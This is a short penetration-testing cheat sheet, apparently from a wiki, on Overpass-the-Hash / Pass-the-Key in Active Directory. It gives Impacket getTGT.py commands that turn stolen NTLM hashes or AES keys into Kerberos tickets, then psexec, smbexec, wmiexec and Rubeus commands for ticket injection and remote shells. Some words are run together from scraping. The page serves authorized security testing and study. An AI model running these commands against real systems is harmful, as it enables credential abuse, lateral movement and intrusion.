Overpass The Hash/Pass The Key (PTK)
Overpass The Hash/Pass The Key (PTK)
By using Impacket examples:
# Request the TGT with hash
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
# Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
# Request the TGT with password
python getTGT.py <domain_name>/<user_name>:[password]
# Set the TGT for impacket use
export KRB5CCNAME=<TGT_ccache_file>
# Execute remote commands with any of the following by using the TGT
python psexec.py rastalabs.local/[email protected] -k -no-pass
python smbexec.py rastalabs.local/[email protected] -k -no-pass
python wmiexec.py rastalabs.local/[email protected] -k -no-pass# Ask and inject the ticket
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
# Execute a cmd in the remote machine
.\PsExec.exe -accepteula \\<remote_hostname> cmdImpacket’s
psexec.pyofferspsexeclike functionality. This will give you an interactive shell on the Windows host.psexec.pyalso allows using Service Tickets, saved as accachefile for Authentication. It can be obtained via Impacket’sGetST.pyIt is much easier to use variables
target=10.10.10.1
domain=test.local
username=john
export KRB5CCNAME=/full/path/to/john.ccache
python3 psexec.py $domain/$username@$target -k -no-passLast updated